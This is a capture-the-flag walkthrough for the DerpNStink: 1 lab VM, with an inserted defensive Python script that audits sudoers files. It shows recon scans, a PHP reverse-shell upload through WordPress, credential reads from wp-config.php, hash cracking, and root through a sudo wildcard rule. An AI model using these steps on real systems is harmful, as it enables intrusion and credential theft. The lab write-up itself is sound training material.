Amonsec

DerpNStink 1: CTF walkthrough

Introduction

Name: DerpNStink: 1

Release date: 9 Feb 2018

Author: Bryan Smith

Series: DerpNStink

Enumeration

We can search for the IP address of the VM with arp-scan:

redacted@odin:~$ arp-scan --localnet
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
[redacted]
[redacted]
[redacted]
[redacted]
[redacted]
[redacted]
192.168.1.105   00:0c:29:29:33:ed   VMware, Inc.
192.168.1.105   ac:bc:32:80:fa:7f   (Unknown) (DUP: 2)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.450 seconds (104.49 hosts/sec). 4 responded
redacted@odin:~$

Then we can search for open ports:

redacted@odin:~$ nmap -A -F -O -sV --reason 192.168.1.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-07 03:43 EST
Nmap scan report for 192.168.1.105
Host is up, received arp-response (0.00086s latency).
Not shown: 97 closed ports
Reason: 97 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (EdDSA)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:29:33:ED (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.86 ms 192.168.1.105

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds
redacted@odin:~$

First flag

First of all, we have to add the derpnstink domain name to our /etc/hosts file, as this file on the web server tells us.

redacted@odin:~$ curl http://192.168.1.105/webnotes/info.txt
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->
redacted@odin:~$

So, we simply have to execute this command:

redacted@odin:~$ echo '192.168.1.105        derpnstink.local' >> /etc/hosts

Then, the first flag can be found in the source code of the index.html page.

redacted@odin:~$ curl http://derpnstink.local |html2text
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1298  100  1298    0     0   1298      0  0:00:01 --:--:--  0:00:01  158k
h1 style="color:Purple; font-size:250%;">DeRPnStiNK
[derp.png] [stinky.png]
<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
redacted@odin:~$

Now, we can search for other directories or pages.

We start with gobuster. After a few seconds the weblog directory appears.

redacted@odin:~$ gobuster -u http://derpnstink.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e
Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://derpnstink.local
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://derpnstink.local/weblog (Status: 301)
http://derpnstink.local/php (Status: 301)
http://derpnstink.local/css (Status: 301)
http://derpnstink.local/js (Status: 301)
http://derpnstink.local/javascript (Status: 301)
http://derpnstink.local/temporary (Status: 301)
=====================================================
redacted@odin:~$

Then, another scan of the weblog directory shows us that it is a WordPress blog.

redacted@odin:~$ gobuster -u http://derpnstink.local/weblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e
Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://derpnstink.local/weblog/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://derpnstink.local/weblog/wp-content (Status: 301)
http://derpnstink.local/weblog/wp-includes (Status: 301)
http://derpnstink.local/weblog/wp-admin (Status: 301)
=====================================================
redacted@odin:~$

Finally, we can log in to the WordPress admin panel with the user admin and the password admin.

After a bit of searching, we can see that we can upload arbitrary files when we add a new slide.

[Screenshot: derpnstink_1_ctf__walktrough_galery_rshell_upload.png]

Note: I used the basic php-reverse-shell from pentestmonkey, which gave me a first access to the system.

[Screenshot: derpnstink_1_ctf__walktrough_low_priv_shell.png]

Second flag

On the system, we can log in to the MySQL service with the credentials found in the /var/www/html/weblog/wp-config.php file.

www-data@DeRPnStiNK:/var/www/html/weblog$ cat wp-config.php
cat wp-config.php
<?php
[..snip..]
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'mysql');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

After that, we can find the second flag in the wp_posts table of the wordpress database.

www-data@DeRPnStiNK:/var/www/html/weblog$ mysql -uroot -pmysql -Dwordpress
[..snip..]
mysql> use wordpress
use wordpress
Database changed
mysql> select * from wp_posts;
[..snip..]
| closed         | closed      |               | 2-revision-v1 |         |        | 2017-11-13 03:46:02 | 2017-11-13 03:46:02 |                       |           2 | http://derpnstink.local/weblog/2-revision-v1/               |          0 | revision  |                |             0 |
|  8 |           1 | 2017-11-13 05:39:11 | 0000-00-00 00:00:00 | flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
[..snip..]

Moreover, in the wp_users table, another user is present, unclestinky.

mysql> select * from wp_users;
select * from wp_users;
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
| ID | user_login  | user_pass                          | user_nicename | user_email                   | user_url | user_registered     | user_activation_key                           | user_status | display_name | flag2 |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
|  1 | unclestinky | $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky   | unclestinky@DeRPnStiNK.local |          | 2017-11-12 03:25:32 | 1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1 |           0 | unclestinky  |       |
|  2 | admin       | $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin         | admin@derpnstink.local       |          | 2017-11-13 04:29:35 |                                               |           0 | admin        |       |
+----+-------------+------------------------------------+---------------+------------------------------+----------+---------------------+-----------------------------------------------+-------------+--------------+-------+
2 rows in set (0.00 sec)

We can easily crack this WordPress (phpass) hash with hashcat.

[..snip..]
$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
Time.Started.....: Wed Mar  7 12:57:55 2018 (1 min, 16 secs)
Time.Estimated...: Wed Mar  7 12:59:11 2018 (0 secs)
Guess.Base.......: File (Desktop/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:    37078 H/s (9.24ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 2801664/14344385 (19.53%)
Rejected.........: 0/2801664 (0.00%)
Restore.Point....: 2777088/14344385 (19.36%)
Candidates.#2....: westham76 -> wcw32792

Started: Wed Mar  7 12:57:51 2018
Stopped: Wed Mar  7 12:59:12 2018
[..snip..]

So, the password for the user stinky is wedgie57.

Third flag

The third flag can be found on the Desktop of the stinky user.

stinky@DeRPnStiNK:~/Desktop$ cat flag.txt
cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$

For the moment, the SSH service can only be used with a private key.

Fortunately for us, a private key is hidden in the /home/stinky/ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh folder.

stinky@DeRPnStiNK:~$ cat ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
cat ftp/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
[..snip..]
stinky@DeRPnStiNK:~$

We can use this private key to log in to the system.

redacted@odin:~$ ssh -i privatekey stinky@192.168.1.105
Ubuntu 14.04.5 LTS
[ASCII-art "Derrrrrp N Stink" banner snipped]
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

386 packages can be updated.
305 updates are security updates.

Last login: Wed Mar  7 08:33:30 2018 from 192.168.1.116
stinky@DeRPnStiNK:~$

Fourth flag

After a bit of searching, we find an interesting conversation in ftp/files/network-logs/derpissues.txt and a pcap file in the user's Documents folder.

stinky@DeRPnStiNK:~$ cat ftp/files/network-logs/derpissues.txt 
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
stinky@DeRPnStiNK:~$ ls -la Documents/
total 4300
drwxr-xr-x  2 stinky stinky    4096 Nov 13 01:25 .
drwx------ 12 stinky stinky    4096 Mar  7 08:33 ..
-rw-r--r--  1 root   root   4391468 Nov 13 00:56 derpissues.pcap
stinky@DeRPnStiNK:~$

If we download and analyse this pcap file with Wireshark, we can find the password of the mrderp user.

[Screenshot: derpnstink_1_ctf__walktrough_pcap_mrderp_password.png]

If we switch to the user mrderp, we find a weird file called helpdesk.log on the Desktop, which gives us a link to a pastebin page.

mrderp@DeRPnStiNK:~/Desktop$ cat helpdesk.log
[..snip..]
Closed Ticket Notification

Thank you for contacting the Help Desk. Your ticket information and its resolution is
below. If you feel that the ticket has not been resolved to your satisfaction or you need additional
assistance, please reply to this notification to provide additional information.
If you need immediate help (i.e. you are within two days of a deadline or in the event of a
security emergency), call us or visit our Self Help Web page at https://pastebin.com/RzK9WfGw 
Note that the Help Desk's busiest hours are between 10 a.m. (ET)
and 3 p.m. (ET).
[..snip..]

If we take a look at this pastebin, we can see that the /etc/sudoers file appears to contain this rule.

[Screenshot: derpnstink_1_ctf__walktrough_pastbin_sudoer_rule.png]

This rule means that if we create a file named derpy in the /home/mrderp/binaries/ folder, we will be able to execute it with root privileges.

mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ touch binaries/derpy.sh
mrderp@DeRPnStiNK:~$ echo '/bin/bash' >> binaries/derpy.sh 
mrderp@DeRPnStiNK:~$ chmod +x binaries/derpy.sh
mrderp@DeRPnStiNK:~$ sudo binaries/./derpy.sh
root@DeRPnStiNK:~#
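From the defender's side, the rule described above is the thing to catch before anyone gets a shell: a sudo command spec with a wildcard that points into a directory the user can write to lets that user decide what runs as root. The Python audit below is an added example, not part of the walkthrough; the sudoers lines are constructed to match the description in the text (the real rule is only visible in the pastebin screenshot), and the function flags command paths that contain a wildcard or live under a user-writable tree such as /home or /tmp.

```python
import re

# Constructed sudoers content for this example. The walkthrough only describes the real rule
# ("a file named derpy in /home/mrderp/binaries/ runs as root"), so the mrderp line below is
# shaped like that description and is not a quote of the VM's /etc/sudoers.
SAMPLE_SUDOERS = """\
Defaults env_reset
root   ALL=(ALL:ALL) ALL
%sudo  ALL=(ALL:ALL) ALL
mrderp ALL=(ALL:ALL) /home/mrderp/binaries/derpy*
stinky ALL=(root) NOPASSWD: /usr/bin/apt-get update
"""

# user-or-group  host = (runas) command-list   (aliases and Defaults lines are ignored here)
RULE_RE = re.compile(r'^(?P<who>\S+)\s+\S+\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$')
TAG_RE = re.compile(r'^(?:(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|LOG_OUTPUT):\s*)+')
USER_WRITABLE_PREFIXES = ('/home/', '/tmp/', '/var/tmp/', '/dev/shm/')


def risky_rules(sudoers_text: str):
    """Return (user, command_path, reasons) for rules whose command the user can influence."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#') or line.startswith('Defaults'):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group('cmds').split(','):
            cmd = TAG_RE.sub('', cmd.strip())
            if not cmd:
                continue
            path = cmd.split()[0]
            if path == 'ALL':
                continue  # unrestricted sudo is a policy decision, not a path defect
            reasons = []
            if any(c in path for c in '*?['):
                reasons.append('wildcard in command path')
            if path.startswith(USER_WRITABLE_PREFIXES):
                reasons.append('command lives in a user-writable tree')
            if reasons:
                findings.append((m.group('who'), path, reasons))
    return findings


if __name__ == '__main__':
    for who, path, reasons in risky_rules(SAMPLE_SUDOERS):
        print(f'{who}: {path} -> {", ".join(reasons)}')
```

On a live host, run it over the output of `sudo cat /etc/sudoers /etc/sudoers.d/*`; only the mrderp line in the sample is reported.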

We successfully gain root privileges and get the last flag of the CTF.

root@DeRPnStiNK:~# cat /root/Desktop/flag.txt 
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
[..snip..]
root@DeRPnStiNK:~#

Flags

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)